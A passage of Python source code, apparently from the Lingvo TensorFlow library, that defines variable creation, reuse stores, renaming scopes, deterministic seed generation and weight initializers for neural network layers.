      'reasons we stack all the variables in creating those n-layers.')
  p.Define('repeat_prefix_split_dims_mapping', None,
           'Tensor split dims mapping for the repeat_prefix dims.')
  return p
def FindNeeded(endpoints):
  """List names of tensors and operations required to compute endpoints.

  Performs a reverse graph traversal from the ops producing `endpoints`,
  following data inputs and control inputs.

  Args:
    endpoints: A (possibly nested) structure of Tensors and/or tf.Operations.

  Returns:
    A set of op and tensor names reachable from `endpoints`.
  """
  names_seen = set()
  pending = [e if isinstance(e, tf.Operation) else e.op
             for e in Flatten(endpoints)]
  while pending:
    op = pending.pop()
    if op.name in names_seen:
      continue
    names_seen.add(op.name)
    # Record all output tensor names of this op as well.
    names_seen.update(out.name for out in op.outputs)
    pending.extend(inp.op for inp in op.inputs)
    pending.extend(op.control_inputs)
  return names_seen
class _CollectionGetter:
  """Lazily creates and returns a graph-local singleton from a collection."""

  def __init__(self, key, default_factory):
    # key: graph collection key; default_factory: builds the value on first use.
    self._key = key
    self._default_factory = default_factory

  def __call__(self):
    existing = tf.get_collection(self._key)
    if existing:
      # The collection is only ever populated by this getter, so it must hold
      # exactly one value.
      assert len(existing) == 1
      return existing[0]
    value = self._default_factory()
    tf.add_to_collection(self._key, value)
    return value
def SanitizeScopeKey(key):
  """Removes invalid symbols from name_scope keys.

  Strips a single leading underscore, maps '[' to '_' and drops ']'.
  """
  if key.startswith('_'):
    key = key[1:]
  return key.translate(str.maketrans({'[': '_', ']': None}))
# Maintain a session for unit tests (initialized in test_utils.py).
_SESSION_SCOPE = ThreadLocalStack()


@contextlib.contextmanager
def UnitTestSessionScope(sess):
  """Installs `sess` as the innermost unit-test session for the context."""
  _SESSION_SCOPE.stack.append(sess)
  try:
    yield
  finally:
    _SESSION_SCOPE.stack.pop()


def GetUnitTestSession():
  """Returns the innermost unit-test session, or None if none is active."""
  if not _SESSION_SCOPE.stack:
    return None
  return _SESSION_SCOPE.stack[-1]
# Global variable to control multitask variable reuse
# If False (default) the default tf.get_variable is used, that is:
# - Reusing scopes only allow getting existing variables
# - Non-reusing scopes only allow getting new variables
# With GetOpportunisticVariableReuse() == True:
# - Reusing scopes only allow getting existing variables, as usual
# - Non-reusing scopes reuse new variables or get new ones
_OPPORTUNISTIC_VARIABLE_REUSE = ThreadLocalStack()


@contextlib.contextmanager
def OpportunisticVariableReuseScope(enable_opportunistic_reuse=True):
  """Pushes the opportunistic-reuse setting for the duration of the context."""
  _OPPORTUNISTIC_VARIABLE_REUSE.stack.append(enable_opportunistic_reuse)
  try:
    yield
  finally:
    _OPPORTUNISTIC_VARIABLE_REUSE.stack.pop()


def GetOpportunisticVariableReuse():
  """Returns the innermost opportunistic-reuse setting (False by default)."""
  if not _OPPORTUNISTIC_VARIABLE_REUSE.stack:
    return False
  return _OPPORTUNISTIC_VARIABLE_REUSE.stack[-1]
# Stack of flags controlling the variable-name sanity check performed in
# MaybeReuseFromVariableStore(); managed by DisableVariableNameChecking().
_DISABLE_VARIABLE_NAME_CHECKING = ThreadLocalStack()


@contextlib.contextmanager
def DisableVariableNameChecking(disable=True):
  """Disables the created-variable name check inside the context."""
  _DISABLE_VARIABLE_NAME_CHECKING.stack.append(disable)
  try:
    yield
  finally:
    _DISABLE_VARIABLE_NAME_CHECKING.stack.pop()
# Stack of variable-renaming rule lists; see VariableRenameScope() and
# GetVariableName().
_VARIABLE_RENAME_RULES = ThreadLocalStack()

# Global variable to track task calling scope.
# Currently only used for TPU Embedding purposes as a TPUEmbeddingLayer
# may be shared across tasks and the calling task needs to be known
# for tracking embedding activations for backprop.
_TASK_CALL_SCOPE = ThreadLocalStack()
def TaskCallScopeName(task):
  """Get a unique string identifying a task.

  Combines the task's configured name with its object id so that two task
  instances with the same name remain distinguishable.
  """
  return '{}_{}'.format(task.params.name, id(task))
@contextlib.contextmanager
def TaskCallScope(task):
  """Marks `task` as the current calling task for the duration of the context."""
  _TASK_CALL_SCOPE.stack.append(TaskCallScopeName(task))
  try:
    yield
  finally:
    _TASK_CALL_SCOPE.stack.pop()
def GetTaskCallScope():
  """Get the current task call scope."""
  if not _TASK_CALL_SCOPE.stack:
    return None
  return _TASK_CALL_SCOPE.stack[-1]
@contextlib.contextmanager
def VariableRenameScope(renames):
  """Append the renaming rules to the stack of renames.

  Args:
    renames: pairs of (regexp, new_name_format). If the regexp matches, the
      new_name_format will be interpolated using the matched groups.

  Yields:
    scope in which the renaming rules are applied
  """
  # LIFO: rules pushed by inner scopes are applied after outer ones in
  # GetVariableName(), so inner matches take precedence.
  _VARIABLE_RENAME_RULES.stack.append(renames)
  try:
    yield
  finally:
    _VARIABLE_RENAME_RULES.stack.pop()
def GetVariableName(name):
  """Get variable name after application of all renaming rules.

  Args:
    name: untransformed variable name with scope_name prepended

  Returns:
    name possibly modified using renaming rules
  """
  matched = False
  new_name = name
  for renames in _VARIABLE_RENAME_RULES.stack:
    tf.logging.log_first_n(
        tf.logging.WARN,
        ('Renaming variables is not supported in eager mode. '
         'Please look into migrating away from variable renaming.'), 1)
    for regexp, name_format in renames:
      match = re.match(regexp, name)
      if not match:
        continue
      if matched:
        tf.logging.warning('Multiple matches for: %s', name)
      matched = True
      # Later (inner) rules overwrite earlier matches.
      new_name = name_format % match.groups()
  if new_name != name:
    tf.logging.info("WARNING!!! Renaming variable '%s' to '%s'", name, new_name)
  return new_name
# Stack of (regex, dtype) override lists; managed by
# VariableListDtypeRegexScope() and consumed by FindDataType().
_LIST_REGEX_DTYPE = ThreadLocalStack()


@contextlib.contextmanager
def VariableListDtypeRegexScope(list_regex_dtypes):
  """Append the list of (regex, dtype) to override the dtype.

  Args:
    list_regex_dtypes: pairs of (regexp, dtype). If the regexp matches, the data
      type of the variable will be changed by the corresponding dtype.

  Yields:
    scope in which the list of (regex, dtype) is applied.
  """
  _LIST_REGEX_DTYPE.stack.append(list_regex_dtypes)
  try:
    yield
  finally:
    _LIST_REGEX_DTYPE.stack.pop()
def FindDataType(var_name):
  """Find the data type for var_name.

  Args:
    var_name: A string, name of the variable.

  Returns:
    The dtype of the first matched regex with var_name, or None if no matching
    found.
  """
  matches = (dtype
             for overrides in _LIST_REGEX_DTYPE.stack
             for pattern, dtype in overrides
             if re.match(pattern, var_name))
  return next(matches, None)
def GenerateSeedFromName(name):
  """Generate a deterministic random seed from a name string.

  Args:
    name: A string (or UTF-8 encoded bytes).

  Returns:
    An integer seed in the range [0, 2**31 - 1).
  """
  md5 = hashlib.md5()
  # Python-3 native replacement for six.ensure_binary(): str is UTF-8
  # encoded, bytes pass through unchanged. Same digest as before.
  md5.update(name.encode('utf-8') if isinstance(name, str) else name)
  return np.int64(int(md5.hexdigest(), 16) % (2**31 - 1))
def MaybeGenerateSeedFromScope():
  """Generate a random seed from the current name of the scope.

  If running in eager mode, this returns 0.

  Returns:
    An integer seed in the range [0, 2**31 - 1).
  """
  if tf.executing_eagerly():
    return 0
  # The no-op's fully-scoped (uniquified) name provides a stable hash source.
  return GenerateSeedFromName(tf.no_op(name='new_step_seed').name)
def GenerateSeedFromId(obj_id):
  """Generate a random seed from the id of an object.

  If deterministic execution (i.e. unit test), generate the seed from a fixed
  unique name instead.

  Args:
    obj_id: id(object).

  Returns:
    An integer seed in the range [0, 2**31 - 1).
  """
  if tf.get_default_graph().seed is not None:
    # We are in a program/test which need determistic randomization.
    with tf.name_scope(''):
      # Entering the empty scope resets to the root name scope, so the op name
      # (and hence the seed) does not depend on the caller's scope.
      return GenerateSeedFromName(tf.no_op(name='new_step_seed').name)
  md5 = hashlib.md5()
  # np.int64 exposes the buffer protocol, so md5 hashes its raw 8 bytes.
  md5.update(np.int64(obj_id))
  return np.int64(int(md5.hexdigest(), 16) % (2**31 - 1))
# Stack of leading shape dims to prepend to variables created by
# CreateVariable(); managed by VariableShapePrefixContext().
_VARIABLE_SHAPE_PREFIXES = ThreadLocalStack()
def GetVarLeadingDimsAsCombinedLayers(var):
  """Gets the number of leading dimensions of `var` marked as combined layers.

  Such dimensions represent variables from different layers stacked together,
  e.g., in RepeatLayer, and optimizers (which have shape-dependant behaviors)
  can adjust its behavior based on this information to match the behavior for
  separate layer variables.

  Args:
    var: A variable.

  Returns:
    An integer representing the number of leading dimensions.
  """
  try:
    return var.op.get_attr('_num_leading_dims_for_combined_layers')
  except (ValueError, AttributeError):
    # ValueError: the attr was never set on the op.
    # AttributeError: e.g. 'DistributedVarOp' object has no attribute
    # 'get_attr'.
    return 0
@contextlib.contextmanager
def VariableShapePrefixContext(shape_prefix):
  """Add a shape prefix to variable created by CreateVariable().

  This new dimension will be marked as combined-layers. See also comments for
  GetVarLeadingDimsAsCombinedLayers().

  Args:
    shape_prefix: a positive integer of shape prefix.

  Yields:
    None.
  """
  # A non-positive prefix would be a meaningless variable dimension.
  assert shape_prefix > 0, ('%s' % shape_prefix)
  _VARIABLE_SHAPE_PREFIXES.stack.append(shape_prefix)
  try:
    yield
  finally:
    _VARIABLE_SHAPE_PREFIXES.stack.pop()
def GetVariableShapePrefixes():
  """Return the list of shape prefixes for CreateVariable()."""
  # Innermost VariableShapePrefixContext entries appear last.
  return _VARIABLE_SHAPE_PREFIXES.stack


def GetVariableNumLeadingDimsForCombinedLayersContext():
  """Return the number of leading combined-layers dims for CreateVariable()."""
  # Each active VariableShapePrefixContext contributes exactly one leading dim.
  return len(_VARIABLE_SHAPE_PREFIXES.stack)
def GetFanInFanOut(shape, prefix_dims_to_skip):
  """Returns (fan_in, fan_out) of a weight variable of the give shape.

  Args:
    shape: A sequence of ints, the variable shape.
    prefix_dims_to_skip: Number of leading (combined-layers) dims to ignore.

  Returns:
    (fan_in, fan_out); (None, None) for an empty shape.

  Raises:
    ValueError: if prefix_dims_to_skip exceeds the shape rank.
  """
  if not shape:
    return None, None
  if len(shape) < prefix_dims_to_skip:
    raise ValueError(f'Variable shape is {shape} but prefix_dims_to_skip is '
                     f'{prefix_dims_to_skip}, larger than the shape rank.')
  core = shape[prefix_dims_to_skip:]
  if not core:
    return 1, 1
  if len(core) == 1:
    # Following _compute_fans() from TF's init_ops.py.
    return core[0], core[0]
  # Treat all but the last two dims as the receptive field (conv kernels).
  receptive_field_size = 1
  for dim in core[:-2]:
    receptive_field_size *= dim
  return core[-2] * receptive_field_size, core[-1] * receptive_field_size
@contextlib.contextmanager
def VariableStore(default_store=None):
  """Keeps track of {variable_name: (variable, var_params)}.

  When CreateVariable would result in a variable name that exists in the store,
  the existing variable is returned, or an error is raised, depending on whether
  the variable scope supports reuse.

  This mimics the behavior of tf.compat.v1.get_variable() with regards to
  variable reuse, while functioning correctly in TF2 eager context. However, it
  only applies to variables created via CreateVariable.

  When there are nested VariableStore contexts, they all provide the same
  variable store object. That is, the scope of the variable store is the
  outermost context.

  Args:
    default_store: variable store dict. If set, and there is no store in the
      stack, use this store instead of creating a new dict.

  Yields:
    A dictionary representing the variable store.
  """
  old_store = _GetVariableStore()
  default_store = default_store or {}
  # Nested contexts keep sharing the outermost store.
  store = old_store if old_store is not None else default_store
  graph = tf.get_default_graph()
  # Attach the store to the outermost graph (e.g. outside tf.function graphs).
  while hasattr(graph, 'outer_graph') and graph.outer_graph:
    graph = graph.outer_graph
  graph.lingvo_variable_store = store
  try:
    yield store
  finally:
    # Bug fix: restore the previous store even when the context body raises;
    # previously an exception would leak this store into unrelated code.
    graph.lingvo_variable_store = old_store
def _GetVariableStore():
  """Returns the active variable store dict, or None if none is installed."""
  graph = tf.get_default_graph()
  # The store always lives on the outermost graph; see VariableStore().
  while hasattr(graph, 'outer_graph') and graph.outer_graph:
    graph = graph.outer_graph
  return getattr(graph, 'lingvo_variable_store', None)
def _DefaultVariableCreator(**kwargs):
  """Innermost creator: strips lingvo-only kwargs and calls tf.get_variable."""
  del kwargs['var_name']
  del kwargs['var_params']
  return tf.get_variable(**kwargs)
# Stack of creator wrappers registered via VariableCreatorScope().
_VARIABLE_CREATOR_STACK = ThreadLocalStack()


def _GetVariableCreator():
  """Composes registered variable creators around _DefaultVariableCreator."""
  creator = _DefaultVariableCreator
  # Latest entry in _VARIABLE_CREATOR_STACK is called last.
  for wrapper in reversed(_VARIABLE_CREATOR_STACK.stack):
    creator = functools.partial(wrapper, creator)
  return creator
@contextlib.contextmanager
def VariableCreatorScope(variable_creator):
  """Yields a context around a variable_creator, used by `CreateVariable()`.

  The function must have the following signature::

    def variable_creator(next_creator, **kwargs)

  The function may delegate variable creation to the next variable creator, or
  return its own tf.Variable.

  This differs from tf.variable_creator_scope in that tf.variable_creator_scope
  modifies a tf.Variable() call while this modifies a tf.get_variable() call. As
  the code is migrated to TF2 and tf.get_variable() is deprecated, this may be
  upgraded to using tf.variable_creator_scope instead.

  This differs from tf.variable_scope(custom_getter=variable_creator) in that
  the kwargs passed can be manipulated.

  Variable creators are resolved from the outermost towards the innermost.
  The innermost variable creator function is tf.get_variable.

  The passed in kwargs must conform to what tf.get_variable accepts, with the
  addition of `var_name` and `var_params`.

  Args:
    variable_creator: A variable creator function.

  Yields:
    None; the creator is active within the context.
  """
  _VARIABLE_CREATOR_STACK.stack.append(variable_creator)
  try:
    yield
  finally:
    _VARIABLE_CREATOR_STACK.stack.pop()
def PlaceOnTpuCore(core_id):
  """Returns a VariableCreatorScope that places variables on a given tpu core.

  Only applies when running with TPUs.

  Does not yet properly support model parallelism.

  Args:
    core_id: The tpu core id.

  Returns:
    A VariableCreatorScope context manager wrapping the placement creator.
  """

  def Creator(next_creator, **kwargs):
    """Creates the variable with an explicit device assignment."""
    cluster = cluster_factory.Current()
    if use_tpu():
      device = cluster.WorkerDeviceInModelSplit(core_id)
    elif (
        tpu_compat() and
        cluster.params.job in ('controller', 'trainer_client', 'executor_tpu')):
      # The job is running in a fleet that uses tpu, but does not itself have
      # access to the tpu, e.g. controller job. In this case, the returned
      # device needs to be the cpu device on the tpu host for the given core.
      # FIXME: the current implementation is wrong for large values of core_id.
      device = cluster.ListDevices(cluster.params.worker)[0, 0]
    else:
      # Not a TPU setup: leave device placement unconstrained.
      device = ''
    with tf.device(device):
      return next_creator(**kwargs)

  return VariableCreatorScope(Creator)
# Variable creators.
def MaybeReuseFromVariableStore(next_creator, **kwargs):
  """Variable creator that attempts to reuse variables from variable store.

  Args:
    next_creator: The next variable creator to delegate to.
    **kwargs: Variable creation kwargs; must contain `var_name` (the full
      variable name) and `var_params` (the variable's WeightParams).

  Returns:
    The reused or newly created variable.

  Raises:
    ValueError: if the created variable's name does not match `var_name` and
      name checking is enabled.
  """
  var_name = kwargs['var_name']
  p = kwargs['var_params']
  store = _GetVariableStore()
  if store is not None:
    if var_name in store:
      if tf.get_variable_scope().reuse:
        var, cached_p = store[var_name]
        tf.logging.info('Reusing var %s', var.name)
        # Reuse is only valid if the configs are identical.
        assert cached_p == p.ToText(), (
            'Cached config:\n %s vs new config:\n %s' % (cached_p, p.ToText()))
        return var
  var = next_creator(**kwargs)
  # Bug fix: the original tested `not _DISABLE_VARIABLE_NAME_CHECKING`, i.e.
  # the truthiness of the ThreadLocalStack object itself (always truthy unless
  # ThreadLocalStack defines __bool__), not the flag pushed by
  # DisableVariableNameChecking(). Read the innermost pushed value instead;
  # checking is enabled by default.
  name_checking_disabled = (_DISABLE_VARIABLE_NAME_CHECKING.stack[-1]
                            if _DISABLE_VARIABLE_NAME_CHECKING.stack else False)
  if not name_checking_disabled:
    if var.name != f'{var_name}/var:0':
      raise ValueError(
          'Expected %s but created variable %s. Did you mean to set reuse=True '
          'or reuse=tf.AUTO_REUSE in VarScope, or did not create a '
          'VariableStore for variable reuse?' % (f'{var_name}/var:0', var.name))
  tf.logging.info('Creating var %s shape=%s on device %s', var.name, var.shape,
                  var.device)
  for col in p.collections:
    tf.add_to_collection(col, var)
  if store is not None:
    store[var_name] = (var, p.ToText())
  return var
def MaybePinVarsToCpu(next_creator, **kwargs):
  """Variable creator that pins variables to cpu:0 when pin_vars_to_cpu is set."""
  if not _FromGlobal('pin_vars_to_cpu'):
    return next_creator(**kwargs)
  with tf.device('/cpu:0'):
    return next_creator(**kwargs)
def MaybeOpportunisticVariableReuse(next_creator, **kwargs):
  """Variable creator applying AUTO_REUSE when opportunistic reuse is enabled."""
  if not GetOpportunisticVariableReuse():
    return next_creator(**kwargs)
  with tf.variable_scope(tf.get_variable_scope(), reuse=tf.AUTO_REUSE):
    return next_creator(**kwargs)
def GetLingvoVariableCreator(name, var_name):
  """Returns a variable creator function.

  Args:
    name: The layer scope name whose reuse/getter/caching settings to inherit.
    var_name: The full (possibly renamed) scope name to create the variable in.

  Returns:
    A creator usable with VariableCreatorScope().
  """

  def LingvoVariableCreator(next_creator, **kwargs):
    """Lingvo variable creator."""
    # TODO(yonghui): Possibly get away from variable_scope and implement our own
    # variable sharing mechanism.
    # Enter `name` to capture its reuse/custom_getter/caching_device settings
    # into a fresh VariableScope that forces resource variables.
    with tf.variable_scope(name) as scope:
      var_scope = tf.VariableScope(
          scope.reuse,
          custom_getter=scope.custom_getter,
          caching_device=scope.caching_device,
          use_resource=True)
    # The variable itself is created under `var_name` (not `name`), so that
    # variable renaming rules take effect.
    with tf.variable_scope(var_scope), tf.variable_scope(var_name):
      return next_creator(**kwargs)

  return LingvoVariableCreator
# TODO(yonghui): Add support for partitioned Variables.
def CreateVariable(name,
                   params,
                   trainable=True,
                   collections=None,
                   default_seed=None,
                   synchronization=tf.VariableSynchronization.AUTO,
                   aggregation=tf.VariableAggregation.NONE):
  """Creates tf.Variable according to param_config.

  Dispatches to the stateless-RNG or the stateful-RNG implementation depending
  on the --stateless_vars_init setting.

  Args:
    name: A string, name of the variable.
    params: A WeightParams specifying the details of how this variable should
      be constructed and initialized.
    trainable: Whether or not the variable is trainable.
    collections: Override the default variable collection (
      tf.GraphKeys.GLOBAL_VARIABLES). Note that specifying a collections
      argument in `params` does not override this collection; the caller must
      set this field explicitly in the call to CreateVariable().
    default_seed: Seed to use for initialization if not specified in params.
      Used for deterministic initialization in tests.
    synchronization: Indicates when a distributed variable will be aggregated.
      Accepted values are constants defined in the class
      tf.VariableSynchronization. By default the synchronization is set to
      AUTO and the current DistributionStrategy chooses when to synchronize.
    aggregation: Indicates how a distributed variable will be aggregated.
      Accepted values are constants defined in the class
      tf.VariableAggregation.

  Returns:
    The created variable.
  """
  impl = (_CreateVariableStateless
          if use_stateless_vars_init() else _CreateVariableStateful)
  return impl(name, params, trainable, collections, default_seed,
              synchronization, aggregation)
def _CreateVariableStateful(name,
                            params,
                            trainable=True,
                            collections=None,
                            default_seed=None,
                            synchronization=tf.VariableSynchronization.AUTO,
                            aggregation=tf.VariableAggregation.NONE):
  """Creates tf.Variable using TF stateful RNGs according to param_config.

  Args:
    name: A string, name of the variable.
    params: A WeightParams specifying the details of how this variable should be
      constructed and initialized.
    trainable: Whether or not the variable is trainable.
    collections: Override the default variable collection (
      tf.GraphKeys.GLOBAL_VARIABLES).
    default_seed: Seed to use for initialization if not specified in params.
      Used for deterministic initialization in tests.
    synchronization: Indicates when a distributed a variable will be aggregated.
      Accepted values are constants defined in the class
      tf.VariableSynchronization. By default the synchronization is set to AUTO
      and the current DistributionStrategy chooses when to synchronize.
    aggregation: Indicates how a distributed variable will be aggregated.
      Accepted values are constants defined in the class tf.VariableAggregation.

  Returns:
    The created variable.
  """
  p = params.Copy()
  shape = tf.TensorShape(ToStaticShape(p.shape)).as_list()
  if shape:
    assert all([dim_size > 0 for dim_size in shape]), shape
    dim0 = shape[0]
  else:
    # Scalar variable: dim0 is only used by *_sqrt_dim init methods.
    dim0 = 1
  # Negative scales are only meaningful for the 'constant' method.
  assert p.init.method == 'constant' or np.all(np.asarray(p.init.scale) >= 0)
  method = p.init.method
  scale = p.init.scale
  seed = p.init.seed
  if IsDefaultParamInit(p.init):
    tf.logging.warning(
        'WARNING!!! var %s is using the default xavier initializer.'
        ' Make sure this is intended.', name)

  # Enter the scope only to resolve the full (possibly renamed) variable name.
  with tf.variable_scope(name) as scope:
    var_name = GetVariableName(scope.name)

  if tf.get_default_graph().seed is not None:
    # We are in a program/test which need determistic randomization.
    if seed is None:
      if default_seed is not None:
        seed = default_seed
      else:
        # We are not given a per-variable random seed. We use hash of
        # variable name as a stable random seed.
        seed = GenerateSeedFromName(var_name)

  # If var_name matches a regex, then set the var_dtype; else use p.dtype.
  var_dtype = FindDataType(var_name)
  if var_dtype is None:
    var_dtype = p.dtype
  # For complex dtypes, the initializer samples in the real component dtype.
  init_dtype = var_dtype.real_dtype
  # TODO(b/172827074): we do not natively support var initialization for
  # int8 type except for constant initialization.
  # NOTE: For int8, we initialize by scaling float32 random values to integer.
  if init_dtype == tf.int8:
    init_dtype = tf.float32

  v_init = _CreateVarInitStateful(name, method, shape, dim0, seed, scale,
                                  init_dtype, p.init.custom_v_init)

  if var_dtype == tf.complex64:

    def ComplexWrapper(init):

      def _Wrapper(shape, dtype):
        del dtype
        # A more complex alternative may be to use the init function for
        # magnitudes and uniform random for phases instead.
        # Sample a leading dim of 2: [0] becomes the real part, [1] the
        # imaginary part.
        shape = [2] + shape
        value = init(shape, init_dtype)
        return tf.complex(value[0], value[1])

      return _Wrapper

    v_init = ComplexWrapper(v_init)

  if var_dtype == tf.int8:

    def FloatToInt8Wrapper(init):

      def _Wrapper(shape, dtype):
        del dtype
        value = init(shape, init_dtype)
        # Symmetric scaling so the extreme float value maps to +/-127.
        scale = tf.math.maximum(
            tf.math.reduce_min(value) / -127,
            tf.math.reduce_max(value) / 127)
        value = tf.divide(value, scale)
        return tf.cast(value, tf.int8)

      return _Wrapper

    v_init = FloatToInt8Wrapper(v_init)

  with contextlib.ExitStack() as context_stack:
    # Creators are entered outermost-first; see VariableCreatorScope().
    for variable_creator_fn in (GetLingvoVariableCreator(name, var_name),
                                MaybeOpportunisticVariableReuse,
                                MaybePinVarsToCpu, MaybeReuseFromVariableStore):
      context_stack.enter_context(VariableCreatorScope(variable_creator_fn))
    if method == 'custom_constant':
      # A constant initializer carries its own value; passing a shape would
      # conflict with it.
      call_shape = None
    else:
      call_shape = GetVariableShapePrefixes() + list(shape)
    var = _GetVariableCreator()(
        var_name=var_name,
        var_params=p,
        name='var',
        shape=call_shape,
        dtype=var_dtype,
        initializer=v_init,
        collections=collections,
        trainable=trainable,
        validate_shape=True,
        synchronization=synchronization,
        aggregation=aggregation)

  combined_layers_dims = GetVariableNumLeadingDimsForCombinedLayersContext()
  if combined_layers_dims > 0:
    # pylint: disable=protected-access
    var.op._set_attr('_num_leading_dims_for_combined_layers',
                     attr_value_pb2.AttrValue(i=combined_layers_dims))

  # Shard the variable according to the sharding spec.
  tensor_split_dims_mapping = p.tensor_split_dims_mapping
  if tensor_split_dims_mapping is not None:
    # Pad with -1 (replicated) for leading dims not covered by the spec.
    count = (
        len(GetVariableShapePrefixes()) + len(shape) -
        len(tensor_split_dims_mapping) -
        len(gshard_utils.GetMeshSplitDimPrefixContext()))
    tensor_split_dims_mapping = [-1] * count + tensor_split_dims_mapping
    var = gshard_utils.MeshSplit(
        var, p.device_mesh, tensor_split_dims_mapping, use_sharding_op=False)
  return var
def _CreateVariableStateless(name,
                             params,
                             trainable=True,
                             collections=None,
                             default_seed=None,
                             synchronization=tf.VariableSynchronization.AUTO,
                             aggregation=tf.VariableAggregation.NONE):
  """Creates tf.Variable using TF stateless RNGs according to `params`.

  Args:
    name: A string, name of the variable.
    params: A WeightParams specifying the details of how this variable should be
      constructed and initialized.
    trainable: Whether or not the variable is trainable.
    collections: Override the default variable collection (
      tf.GraphKeys.GLOBAL_VARIABLES).
    default_seed: Seed to use for initialization if not specified in params.
      Used for deterministic initialization in tests.
    synchronization: Indicates when a distributed a variable will be aggregated.
      Accepted values are constants defined in the class
      tf.VariableSynchronization. By default the synchronization is set to AUTO
      and the current DistributionStrategy chooses when to synchronize.
    aggregation: Indicates how a distributed variable will be aggregated.
      Accepted values are constants defined in the class tf.VariableAggregation.

  Returns:
    The created variable.
  """
  p = params.Copy()
  shape = tf.TensorShape(ToStaticShape(p.shape)).as_list()
  if shape:
    assert all([dim_size > 0 for dim_size in shape]), shape
    dim0 = shape[0]
  else:
    # Scalar variable: dim0 is only used by *_sqrt_dim init methods.
    dim0 = 1
  # Negative scales are only meaningful for the 'constant' method.
  assert p.init.method == 'constant' or np.all(np.asarray(p.init.scale) >= 0)
  method = p.init.method
  scale = p.init.scale
  seed = p.init.seed
  if IsDefaultParamInit(p.init):
    tf.logging.warning(
        'WARNING!!! var %s is using the default xavier initializer.'
        ' Make sure this is intended.', name)

  # Enter the scope only to resolve the full (possibly renamed) variable name.
  with tf.variable_scope(name) as scope:
    var_name = GetVariableName(scope.name)

  # Stateless init always derives a per-variable seed from the variable name
  # (optionally mixed with the user/default seed).
  user_seed = seed if seed is not None else default_seed
  seed = _GenerateStatelessRngSeed(var_name, user_seed)

  # If var_name matches a regex, then set the var_dtype; else use p.dtype.
  var_dtype = FindDataType(var_name)
  if var_dtype is None:
    var_dtype = p.dtype
  init_dtype = var_dtype.real_dtype
  v_init = _CreateVarInitStateless(name, method, shape, dim0, seed, scale,
                                   init_dtype, p.init.custom_v_init)

  if var_dtype == tf.complex64:
    # Unlike the stateful path, there is no complex wrapper here.
    raise TypeError(
        'Stateless variable initialization does not support tf.complex64.')

  with contextlib.ExitStack() as context_stack:
    # Creators are entered outermost-first; note: no MaybePinVarsToCpu here,
    # unlike the stateful path.
    for variable_creator_fn in (GetLingvoVariableCreator(name, var_name),
                                MaybeOpportunisticVariableReuse,
                                MaybeReuseFromVariableStore):
      context_stack.enter_context(VariableCreatorScope(variable_creator_fn))
    var = _GetVariableCreator()(
        var_name=var_name,
        var_params=p,
        name='var',
        shape=GetVariableShapePrefixes() + list(shape),
        dtype=var_dtype,
        initializer=v_init,
        collections=collections,
        trainable=trainable,
        validate_shape=True,
        synchronization=synchronization,
        aggregation=aggregation)

  combined_layers_dims = GetVariableNumLeadingDimsForCombinedLayersContext()
  if combined_layers_dims > 0:
    # pylint: disable=protected-access
    var.op._set_attr('_num_leading_dims_for_combined_layers',
                     attr_value_pb2.AttrValue(i=combined_layers_dims))

  # Shard the variable according to the sharding spec.
  tensor_split_dims_mapping = p.tensor_split_dims_mapping
  if tensor_split_dims_mapping is not None:
    # Pad with -1 (replicated) for leading dims not covered by the spec.
    count = (
        len(GetVariableShapePrefixes()) + len(shape) -
        len(tensor_split_dims_mapping) -
        len(gshard_utils.GetMeshSplitDimPrefixContext()))
    tensor_split_dims_mapping = [-1] * count + tensor_split_dims_mapping
    var = gshard_utils.MeshSplit(
        var, p.device_mesh, tensor_split_dims_mapping, use_sharding_op=False)
  return var
def _RandomXavierUniformInitializer(method, scale, seed):
  """Creates a random Xavier uniform initializer.

  Args:
    method: 'xavier' or 'geo_mean_xavier'.
    scale: Scalar multiplier applied to the sampled values.
    seed: Random seed, or None.

  Returns:
    A callable (shape, dtype) -> Tensor suitable as a variable initializer.
  """
  # Captured at creation time so the initializer reflects the context in which
  # the variable (not the value) was created.
  combined_layers_dims = GetVariableNumLeadingDimsForCombinedLayersContext()

  def XavierUniform(shape, dtype):
    """Xavier initialization (x = sqrt(6. / (in + out)); scale*[-x, x])."""
    if not shape:
      raise ValueError('\'shape\' must not be \'None\' or 0 for XavierUniform')
    fan_in, fan_out = GetFanInFanOut(shape, combined_layers_dims)
    if method == 'xavier':
      limit = math.sqrt(6. / (fan_in + fan_out))
    elif method == 'geo_mean_xavier':
      limit = math.sqrt(3. / math.sqrt(fan_in * fan_out))
    else:
      # Bug fix: previously an unknown method left `limit` unbound, surfacing
      # as a confusing UnboundLocalError; fail with an explicit error instead.
      raise ValueError('Unsupported Xavier initialization method: %s' % method)
    return scale * tf.random.uniform(shape, -limit, limit, dtype, seed)

  return XavierUniform
def _CreateVarInitStateful(name,
                           method,
                           shape,
                           dim0,
                           seed,
                           scale,
                           init_dtype,
                           custom_v_init=None):
  """Creates variable initialization function for a stateful RNG.

  Args:
    name: Variable name, used only for logging.
    method: Initialization method name, e.g. 'gaussian', 'uniform', 'xavier'.
      The *_sqrt_dim / *_sqrt_fanin / *_sqrt_fanout / *_sqrt_fanavg variants
      first rescale `scale` by the corresponding dimension statistic.
    shape: Shape of the variable to initialize.
    dim0: Leading-dimension size used by the *_sqrt_dim methods.
    seed: Seed for the stateful TF random ops.
    scale: Base scale (stddev / bound / constant value, depending on method).
    init_dtype: dtype in which initialization is performed.
    custom_v_init: Initializer returned verbatim for the 'custom' and
      'custom_constant' methods.

  Returns:
    An initializer: either a TF initializer object or a callable
    (shape, dtype) -> Tensor.
  """
  # The *_sqrt_dim variants divide the scale by sqrt(dim0).
  if (method in [
      'gaussian_sqrt_dim', 'uniform_sqrt_dim', 'truncated_gaussian_sqrt_dim'
  ]):
    if len(shape) > 2:
      # This is probably not the right method to use when len(shape) > 2,
      # e.g. dim0 will be 3 with a 3x3 conv2d kernel.
      tf.logging.warning(
          'Initializing %s of shape %s with method %s: dim0=%s. '
          'Make sure that it is intended.', name, shape, method, dim0)
    scale *= 1.0 / math.sqrt(dim0)
  # Rescale by fan-in/fan-out statistics for the corresponding variants.
  combined_layers_dims = GetVariableNumLeadingDimsForCombinedLayersContext()
  if method in ['gaussian_sqrt_fanin', 'truncated_gaussian_sqrt_fanin']:
    fan_in, _ = GetFanInFanOut(shape, combined_layers_dims)
    if fan_in is not None:
      scale *= 1.0 / math.sqrt(fan_in)
  if method in ['gaussian_sqrt_fanout', 'truncated_gaussian_sqrt_fanout']:
    _, fan_out = GetFanInFanOut(shape, combined_layers_dims)
    if fan_out is not None:
      scale *= 1.0 / math.sqrt(fan_out)
  if method in ['gaussian_sqrt_fanavg']:
    fan_in, fan_out = GetFanInFanOut(shape, combined_layers_dims)
    if fan_in is not None and fan_out is not None:
      scale *= math.sqrt(2.0 / (fan_in + fan_out))
